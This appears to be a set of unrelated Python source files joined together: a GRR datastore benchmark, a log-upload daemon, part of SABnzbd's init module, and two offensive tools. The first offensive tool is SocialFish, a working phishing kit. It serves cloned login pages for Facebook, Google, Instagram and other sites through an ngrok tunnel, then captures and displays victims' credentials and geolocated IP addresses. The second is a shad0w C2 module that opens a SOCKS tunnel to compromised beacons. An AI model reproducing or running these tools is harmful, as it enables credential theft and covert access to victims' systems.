predicate_template = "task:threadedflow%d"
value = os.urandom(100)
large_value = os.urandom(10 * 1024 * 1024)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
(subject_template % i, "task:threadedflow", value, None,
self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set rows", (end_time - start_time) / self.n,
self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/somerowthreaded", predicate_template % i, value,
None, self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set attributes",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/somerowthreaded", "task:someflowthreaded", value,
None, self.token, False))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set versions",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/threadedlargerow%d" % i, "task:largeflowthreaded",
large_value, None, self.token, False))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set large values",
(end_time - start_time) / self.small_n, self.small_n)
def ResolvePrefixAndCheck(self, subject, predicate, expected_items=1000):
res = data_store.DB.ResolvePrefix(
subject,
predicate,
token=self.token,
timestamp=data_store.DB.ALL_TIMESTAMPS)
self.assertEqual(len(list(res)), expected_items)
def BenchmarkReadingThreaded(self):
subject_template = "aff4:/threadedrow%d"
predicate_template = "task:threadedflow%d"
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Resolve, (subject_template % i,
"task:threadedflow", self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get rows", (end_time - start_time) / self.n,
self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Resolve,
("aff4:/somerowthreaded", predicate_template % i,
self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get attributes",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(self.ResolvePrefixAndCheck, ("aff4:/somerowthreaded",
"task:someflowthreaded"))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get all versions",
(end_time - start_time) / self.small_n, self.small_n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(self.ResolvePrefixAndCheck,
("aff4:/threadedlargerow%d" % i, "task:largeflowthreaded",
1))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get large values",
(end_time - start_time) / self.small_n, self.small_n)
def BenchmarkAFF4Locks(self):
self.client_id = "C.%016X" % 999
# Write some data to read.
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
cl = aff4.FACTORY.Open(self.client_id, token=self.token)
self.assertEqual(cl.Get(cl.Schema.HOSTNAME), "client1")
# Collect exceptions in threads.
self.fails = []
def Thread():
try:
# Using blocking_lock_timeout of 10 minutes to avoid possible
# timeouts when running tests on slow hardware.
with aff4.FACTORY.OpenWithLock(
self.client_id,
token=self.token,
blocking=True,
blocking_sleep_interval=0.2,
blocking_lock_timeout=600) as client:
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
except Exception as e: # pylint: disable=broad-except
self.fails.append(e)
start_time = time.time()
for _ in xrange(self.n):
Thread()
end_time = time.time()
self.AddResult("OpenWithLock", (end_time - start_time) / self.n, self.n)
self.assertEqual(len(self.fails), 0)
start_time = time.time()
for _ in xrange(self.n):
self.tp.AddTask(Thread, ())
self.tp.Join()
end_time = time.time()
self.AddResult("Multithreaded: OpenWithLock",
(end_time - start_time) / self.n, self.n)
self.assertEqual(len(self.fails), 0)
|
SocialFishTermux.py
|
#!/usr/bin/python3
#-*- coding: utf-8 -*-
# SOCIALFISH v2.0
# by: An0nUD4Y
#
###########################
from time import sleep
from sys import stdout, exit
from os import system, path
from distutils.dir_util import copy_tree
import multiprocessing
from urllib.request import urlopen, quote, unquote
from platform import system as systemos, architecture
from wget import download
import re
import json
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'):
try:
urlopen(host)
return True
except:
return False
if connected() == False:
print ('''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, END))
exit(0)
def checkNgrok():
if path.isfile('Server/ngrok') == False:
print ('[*] Downloading Ngrok...')
if architecture()[0] == '64bit':
# Assumption: 64-bit (arm64) devices should pull ngrok's arm64 archive.
filename = 'ngrok-stable-linux-arm64.zip'
else:
filename = 'ngrok-stable-linux-arm.zip'
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end():
system('clear')
print ('''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{0}NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{1}[ {0} Some more phishing pages have been added to the script for a better attack ]
[ {0} Work Done By------------------------> An0nUD4Y]\n'''.format(GREEN, END, CYAN))
def loadModule(module):
print ('''{0}
_.-=-._ .-,
.' "-.,' /
( AnonUD4Y _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module)
def runPhishing(social, option2):
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/')
if option2 == '1' and social == 'Facebook':
copy_tree("WebPages/fb_standard/", "Server/www/")
if option2 == '2' and social == 'Facebook':
copy_tree("WebPages/fb_advanced_poll/", "Server/www/")
if option2 == '3' and social == 'Facebook':
copy_tree("WebPages/fb_security_fake/", "Server/www/")
if option2 == '4' and social == 'Facebook':
copy_tree("WebPages/fb_messenger/", "Server/www/")
elif option2 == '1' and social == 'Google':
copy_tree("WebPages/google_standard/", "Server/www/")
elif option2 == '2' and social == 'Google':
copy_tree("WebPages/google_advanced_poll/", "Server/www/")
elif option2 == '3' and social == 'Google':
copy_tree("WebPages/google_advanced_web/", "Server/www/")
elif social == 'LinkedIn':
copy_tree("WebPages/linkedin/", "Server/www/")
elif social == 'GitHub':
copy_tree("WebPages/GitHub/", "Server/www/")
elif social == 'StackOverflow':
copy_tree("WebPages/stackoverflow/", "Server/www/")
elif social == 'WordPress':
copy_tree("WebPages/wordpress/", "Server/www/")
elif social == 'Twitter':
copy_tree("WebPages/twitter/", "Server/www/")
elif social == 'Snapchat':
copy_tree("WebPages/Snapchat_web/", "Server/www/")
elif social == 'Yahoo':
copy_tree("WebPages/yahoo_web/", "Server/www/")
elif social == 'Twitch':
copy_tree("WebPages/twitch/", "Server/www/")
elif social == 'Microsoft':
copy_tree("WebPages/live_web/", "Server/www/")
elif social == 'Steam':
copy_tree("WebPages/steam/", "Server/www/")
elif option2 == '1' and social == 'Instagram':
copy_tree("WebPages/Instagram_web/", "Server/www/")
elif option2 == '2' and social == 'Instagram':
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
elif option2 == '1' and social == 'VK':
copy_tree("WebPages/VK/", "Server/www/")
elif option2 == '2' and social == 'VK':
copy_tree("WebPages/VK_poll_method/", "Server/www/")
def waitCreds():
print ("{0}[{1}*{0}]{1} Hi Hacker Everything has been completed.............. Start HAcking ".format(RED, END))
print ('''{0}
_.-=-._ .-,
.' "-.,' /
( AnonUD4Y_ ~.<
`=.____.=" `._\\
[{1}*{0}]{1} NOW YOU WILL GET YOUR VICTIM'S LIVE INFORMATION .
[{1}*{0}]{1} GET VICTIM'S IP ADDRESS, ISP, GEOLOCATION, CITY, COUNTRY, AND MANY MORE STUFF.{0}'''.format(CYAN, END))
print (" {0}[{1}*{0}]{1} Waiting for credentials & victim's info... \n".format(RED, END))
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ('======================================================================'.format(RED, END))
print (' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines)
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
print ('======================================================================'.format(RED, END))
print (' {0}***** HOPE YOU ARE ENJOYING. SO PLEASE MAKE IT MORE POPULAR *****{1}\n {0}{1}'.format(RED, END))
creds.close()
with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip)
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
print ('======================================================================'.format(RED, END))
print (' \n{0}[ VICTIM IP BOGUS ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines)
else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1)
longitude = matchObj.group(2)
print ('======================================================================'.format(RED, END))
print (' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines)
print (' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, END) % (longitude, latitude))
print (' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, END) % (ipinfo['org'], ipinfo['country']))
print (' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, END) % (ipinfo['region'], ipinfo['city']))
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
print ('======================================================================'.format(RED, END))
creds.close()
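# For reference, the parsing above assumes an ipinfo.io response shaped roughly
# like the following (illustrative values only; some fields may be missing):
#
#   {"ip": "203.0.113.7", "city": "Mumbai", "region": "Maharashtra",
#    "country": "IN", "loc": "19.0760,72.8777", "org": "AS0000 Example ISP"}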
def runPEnv():
system('clear')
print (''' {2}-{1} An0nUD4Y {2}|{1} An0nUD4Y {2}|{1} An0nUD4Y {2}- INDIA
. . .
. ' . ' '
' ' ' ' '
███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
. ' '....' ..'. ' .
' . . ' ' ' {1}v2.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}Updated_By--> AnonUD4Y_{2}
' {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
' . '
'
{1}'''.format(GREEN, END, CYAN))
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i)
stdout.flush()
print ("\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END))
if 256 != system('which php'):
print (" --{0}>{1} OK.".format(CYAN, END))
else:
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(RED, END))
exit(0)
if input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF-An0nUD4Y > {1}".format(RED, END, CYAN)).upper() != 'Y':
system('clear')
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL. YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH THE SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
exit(0)
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIn')
option2 = ''
runPhishing('LinkedIn', option2)
elif option == '4':
loadModule('GitHub')
option2 = ''
runPhishing('GitHub', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
elif option == '7':
loadModule('Twitter')
option2 = ''
runPhishing('Twitter', option2)
elif option == '8':
loadModule('Instagram')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('Instagram', option2)
elif option == '9':
loadModule('Snapchat')
option2 = ''
runPhishing('Snapchat', option2)
elif option == '10':
loadModule('Yahoo')
option2 = ''
runPhishing('Yahoo', option2)
elif option == '11':
loadModule('Twitch')
option2 = ''
runPhishing('Twitch', option2)
elif option == '12':
loadModule('Microsoft')
option2 = ''
runPhishing('Microsoft', option2)
elif option == '13':
loadModule('Steam')
option2 = ''
runPhishing('Steam', option2)
elif option == '14':
loadModule('VK')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
runPhishing('VK', option2)
else:
exit(0)
def runNgrok():
system('./Server/ngrok http 1111 > /dev/null &')
sleep(10)
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[a-z]*\.ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, END, GREEN) + url.read() + "{1}".format(CYAN, END, GREEN))
url.close()
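# Note: the URL above is scraped from ngrok's local web interface on port 4040.
# A roughly equivalent sketch using that interface's JSON endpoint (assuming the
# installed ngrok build exposes /api/tunnels) would be:
#
#   tunnels = json.loads(urlopen('http://127.0.0.1:4040/api/tunnels').read().decode())
#   public_url = tunnels['tunnels'][0]['public_url']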
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:1111")
if __name__ == "__main__":
try:
runPEnv()
runNgrok()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)
|
phase3_log_daemon.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# import needed libraries
import glob
import ray
import threading
import time
from google.cloud import storage # type: ignore
from builds.build_utilities import uploads_data_to_gcs_bucket # type: ignore
@ray.remote
class PKTLogUploader(object):
"""Implements a background task that uploads logs from a directory to a Google Cloud Storage Bucket while another
method, external to the class, is run.
SOURCE: https://github.com/ray-project/ray/issues/854#issuecomment-499056709
Attributes:
bucket_name: A string specifying the name of a Google Cloud Storage bucket.
gcs_bucket_location: A string specifying the directory inside the bucket that logs are uploaded to for a specific build.
log_directory: A local directory where log files are written.
sleep_interval: An integer specifying how often logs should be pushed to the Google Cloud Storage Bucket.
"""
def __init__(self, bucket_name, gcs_bucket_location, log_directory, sleep_interval):
self.bucket: storage.Bucket = storage.Client().get_bucket(bucket_name)
self.gcs_bucket_location: str = gcs_bucket_location
self.log_directory: str = log_directory
self.sleep: int = sleep_interval
self.kill_time: int = 172800 # 48 hours
# START BACKGROUND PROCESS
self._thread: threading.Thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def _run(self):
"""Method uploads any log files found in temp_directory from a local directory to a specific directory in a
Google Cloud Storage Bucket every "n" minutes as specified by the input interval variable. This method runs
the program it is called with finishes. There is also a back-up timer that will kill the program
Args:
bucket: A storage Bucket object specifying a Google Cloud Storage bucket.
original_data: A string specifying the location of the original_data directory for a specific build.
temp_directory: A local directory where preprocessed data is stored.
interval: An integer specifying how often the data should be pushed up to the Google Cloud Storage Bucket.
Returns:
None.
"""
# grep for log files in the log_directory
log_file = glob.glob(self.log_directory + '/*.log')[0].split('/')[-1]
runtime = 0
while runtime < self.kill_time:
uploads_data_to_gcs_bucket(self.bucket, self.gcs_bucket_location, self.log_directory, log_file)
time.sleep(self.sleep)
runtime += self.sleep
return None
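if __name__ == '__main__':
    # Minimal usage sketch, not part of the original build pipeline: the bucket name, GCS
    # path, local log directory, and interval below are illustrative placeholders, and at
    # least one *.log file is assumed to already exist in temp/logs.
    ray.init(ignore_reinit_error=True)
    uploader = PKTLogUploader.remote('example-bucket', 'builds/run_01/logs', 'temp/logs', 600)
    # The actor now pushes the temp/logs/*.log file to the bucket every 600 seconds in the
    # background while the long-running build work would execute here.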
|
sharpsocks.py
|
#
# Execute sharpsocks on a session
#
import os
import time
import argparse
import threading
from lib import shellcode
__description__ = "Create a SOCKS tunnel over HTTP/HTTPS\n"
__author__ = "@_batsec_, @rbmaslen"
__type__ = "module"
# identify the task as shellcode execute
USERCD_EXEC_ID = 0x3000
# should we execute sharpsocks on the target
EXEC_SHARPSOCKS = False
# globals for the arguments
ERROR = False
error_list = ""
# location of sharpsocks binary
sharpsocks_BIN = "/root/shad0w/bin/SharpSocks.x86.exe"
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def sharpsocks_callback(shad0w, data):
if shad0w.sharpsocks_verbose:
print(data)
return ""
def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd_line=None):
# modules directory
modules_dir = "/root/shad0w/modules/windows/sharpsocks/"
# binary name
bin_name = "SharpSocksServerCore"
# change to the modules directory
os.chdir(modules_dir)
# create the default cmd line
if quick == True:
cmd_line = f"-l http://{http_listen}"
cmd = f"./{bin_name} {cmd_line} > /tmp/sharpsocks.log"
# start the server
cmd = f"./{bin_name} {cmd_line} > /tmp/sharpsocks.log"
os.popen(cmd)
try:
os.unlink("/tmp/sharpsocks.log")
except:
pass
data = ""
for _ in range(0, 5):
try:
with open("/tmp/sharpsocks.log", "r") as file:
data = file.read()
except:
time.sleep(0.5)
if len(data) == 0:
return None
if quick == False:
print(data)
return None
for line in data.splitlines():
if "Using encryption key" in line:
line = line.split()
key = line[len(line) - 1]
return key
def kill_server():
os.popen("killall -9 SharpSocksServe")
return
def await_for_socks_start(shad0w):
while True:
try:
with open("/tmp/sharpsocks.log", "r") as file:
data = file.read()
if "Socks proxy listening started" in data:
client_ip = shad0w.beacons[shad0w.current_beacon]["ip_addr"]
shad0w.debug.good(f"Socks started ({shad0w.endpoint}:43334 <==> {client_ip})")
break
except FileNotFoundError: pass
return
def main(shad0w, args):
global EXEC_SHARPSOCKS
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# save the raw args
raw_args = args
# usage examples
usage_examples = """
Examples:
sharpsocks -q
sharpsocks --kill
sharpsocks server -l http://*:http-port-to-bind -s *:socks-port-to-bind
sharpsocks client -s http://your.redirector:port/ -k key
"""
parse = argparse.ArgumentParser(prog='sharpsocks',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep argparse behaving nice
parse.exit = exit
parse.error = error
parse.add_argument("server", help="Control the SharpSocks server")
parse.add_argument("client", help="Control the SharpSocks client")
parse.add_argument("-q", "--quick", action='store_true', help="Create a socks tunnel between the C2 and the client")
parse.add_argument("-v", "--verbose", action='store_true', help="Verbose output")
parse.add_argument("--kill", action='store_true', help="Kill the socks tunnel")
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# make sure we have an argument
if len(raw_args) == 1:
parse.print_help()
return
shad0w.sharpsocks_verbose = False
if args.verbose:
shad0w.sharpsocks_verbose = True
if args.kill:
kill_server()
return
if args.quick:
http_listen_addr = f"*:8080"
key = start_sharpsocks_server(http_listen=http_listen_addr)
if key == None:
print("Failed to start the server.")
return
threading.Thread(target=await_for_socks_start, args=(shad0w,)).start()
sharpsocks_cmd_line = f"-s http://{shad0w.endpoint} -k {key}"
args.param = sharpsocks_cmd_line
EXEC_SHARPSOCKS = True
if args.server == "server":
cmdline = ' '.join(raw_args[2:])
start_sharpsocks_server(quick=False, cmd_line=cmdline)
return
if args.server == "client":
args.param = ' '.join(raw_args[2:])
EXEC_SHARPSOCKS = True
if EXEC_SHARPSOCKS:
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
b64_comp_data = shellcode.generate(sharpsocks_BIN, args, args.param)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
|
__init__.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2020 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Imported to be referenced from other files directly
from sabnzbd.version import __version__, __baseline__
import os
import logging
import datetime
import tempfile
import pickle
import gzip
import subprocess
import time
import socket
import cherrypy
import sys
import re
import ssl
from threading import Lock, Thread
##############################################################################
# Determine platform flags
##############################################################################
WIN32 = DARWIN = FOUNDATION = WIN64 = DOCKER = False
KERNEL32 = None
if os.name == "nt":
WIN32 = True
from sabnzbd.utils.apireg import del_connection_info
try:
import ctypes
KERNEL32 = ctypes.windll.LoadLibrary("Kernel32.dll")
except:
pass
elif os.name == "posix":
ORG_UMASK = os.umask(18)
os.umask(ORG_UMASK)
# Check if running in a Docker container
try:
with open("/proc/1/cgroup", "rt") as ifh:
DOCKER = ":/docker/" in ifh.read()
except:
pass
import platform
if platform.system().lower() == "darwin":
DARWIN = True
    # 12 = Sierra, 11 = El Capitan, 10 = Yosemite, 9 = Mavericks, 8 = Mountain Lion
DARWIN_VERSION = int(platform.mac_ver()[0].split(".")[1])
try:
import Foundation
import sabnzbd.utils.sleepless as sleepless
FOUNDATION = True
except:
pass
# Now we can import safely
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.postproc import PostProcessor
from sabnzbd.downloader import Downloader
from sabnzbd.decoder import Decoder
from sabnzbd.assembler import Assembler
from sabnzbd.rating import Rating
import sabnzbd.misc as misc
import sabnzbd.filesystem as filesystem
import sabnzbd.powersup as powersup
from sabnzbd.dirscanner import DirScanner
from sabnzbd.urlgrabber import URLGrabber
import sabnzbd.scheduler as scheduler
import sabnzbd.rss as rss
import sabnzbd.emailer as emailer
from sabnzbd.articlecache import ArticleCache
import sabnzbd.newsunpack
import sabnzbd.encoding as encoding
import sabnzbd.config as config
from sabnzbd.bpsmeter import BPSMeter
import sabnzbd.cfg as cfg
import sabnzbd.database
import sabnzbd.lang as lang
import sabnzbd.par2file as par2file
import sabnzbd.nzbparser as nzbparser
import sabnzbd.api
import sabnzbd.interface
import sabnzbd.nzbstuff as nzbstuff
import sabnzbd.directunpacker as directunpacker
from sabnzbd.decorators import synchronized
from sabnzbd.constants import (
NORMAL_PRIORITY,
VALID_ARCHIVES,
REPAIR_REQUEST,
QUEUE_FILE_NAME,
QUEUE_VERSION,
QUEUE_FILE_TMPL,
)
import sabnzbd.getipaddress as getipaddress
LINUX_POWER = powersup.HAVE_DBUS
START = datetime.datetime.now()
MY_NAME = None
MY_FULLNAME = None
RESTART_ARGS = []
NEW_VERSION = (None, None)
DIR_HOME = None
DIR_APPDATA = None
DIR_LCLDATA = None
DIR_PROG = None
DIR_INTERFACES = None
DIR_LANGUAGE = None
DIR_PID = None
QUEUECOMPLETE = None # stores the nice name of the action
QUEUECOMPLETEACTION = None # stores the name of the function to be called
QUEUECOMPLETEARG = None # stores an extra argument that needs to be passed
DAEMON = None
LOGFILE = None
WEBLOGFILE = None
LOGHANDLER = None
GUIHANDLER = None
LOG_ALL = False
AMBI_LOCALHOST = False
WIN_SERVICE = None # Instance of our Win32 Service Class
BROWSER_URL = None
CERTIFICATE_VALIDATION = True
NO_DOWNLOADING = False # When essentials are missing (SABYenc/par2/unrar)
WEB_DIR = None
WEB_DIR_CONFIG = None
WIZARD_DIR = None
WEB_COLOR = None
SABSTOP = False
RESTART_REQ = False
PAUSED_ALL = False
TRIGGER_RESTART = False # To trigger restart for Scheduler, WinService and Mac
WINTRAY = None # Thread for the Windows SysTray icon
WEBUI_READY = False
LAST_WARNING = None
LAST_ERROR = None
EXTERNAL_IPV6 = False
LAST_HISTORY_UPDATE = 1
# Performance measure for dashboard
PYSTONE_SCORE = 0
DOWNLOAD_DIR_SPEED = 0
COMPLETE_DIR_SPEED = 0
INTERNET_BANDWIDTH = 0
# Rendering of original command line arguments in Config
CMDLINE = " ".join(['"%s"' % arg for arg in sys.argv])
__INITIALIZED__ = False
__SHUTTING_DOWN__ = False
##############################################################################
# Signal Handler
##############################################################################
def sig_handler(signum=None, frame=None):
global SABSTOP, WINTRAY
if sabnzbd.WIN32 and signum is not None and DAEMON and signum == 5:
# Ignore the "logoff" event when running as a Win32 daemon
return True
if signum is not None:
logging.warning(T("Signal %s caught, saving and exiting..."), signum)
try:
save_state()
sabnzbd.zconfig.remove_server()
finally:
if sabnzbd.WIN32:
del_connection_info()
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
time.sleep(0.5)
else:
pid_file()
SABSTOP = True
os._exit(0)
##############################################################################
# Initializing
##############################################################################
INIT_LOCK = Lock()
def get_db_connection(thread_index=0):
# Create a connection and store it in the current thread
if not (hasattr(cherrypy.thread_data, "history_db") and cherrypy.thread_data.history_db):
cherrypy.thread_data.history_db = sabnzbd.database.HistoryDB()
return cherrypy.thread_data.history_db
@synchronized(INIT_LOCK)
def initialize(pause_downloader=False, clean_up=False, evalSched=False, repair=0):
global __INITIALIZED__, __SHUTTING_DOWN__, LOGFILE, WEBLOGFILE, LOGHANDLER, GUIHANDLER, AMBI_LOCALHOST, WAITEXIT, DAEMON, MY_NAME, MY_FULLNAME, NEW_VERSION, DIR_HOME, DIR_APPDATA, DIR_LCLDATA, DIR_PROG, DIR_INTERFACES, DARWIN, RESTART_REQ
if __INITIALIZED__:
return False
__SHUTTING_DOWN__ = False
# Set global database connection for Web-UI threads
cherrypy.engine.subscribe("start_thread", get_db_connection)
# Paused?
pause_downloader = pause_downloader or cfg.start_paused()
# Clean-up, if requested
if clean_up:
# New admin folder
filesystem.remove_all(cfg.admin_dir.get_path(), "*.sab")
# Optionally wait for "incomplete" to become online
if cfg.wait_for_dfolder():
wait_for_download_folder()
else:
cfg.download_dir.set(cfg.download_dir(), create=True)
cfg.download_dir.set_create(True)
# Set access rights for "incomplete" base folder
filesystem.set_permissions(cfg.download_dir.get_path(), recursive=False)
# If dirscan_dir cannot be created, set a proper value anyway.
# Maybe it's a network path that's temporarily missing.
path = cfg.dirscan_dir.get_path()
if not os.path.exists(path):
filesystem.create_real_path(cfg.dirscan_dir.ident(), "", path, False)
# Set call backs for Config items
cfg.cache_limit.callback(new_limit)
cfg.cherryhost.callback(guard_restart)
cfg.cherryport.callback(guard_restart)
cfg.web_dir.callback(guard_restart)
cfg.web_color.callback(guard_restart)
cfg.username.callback(guard_restart)
cfg.password.callback(guard_restart)
cfg.log_dir.callback(guard_restart)
cfg.https_port.callback(guard_restart)
cfg.https_cert.callback(guard_restart)
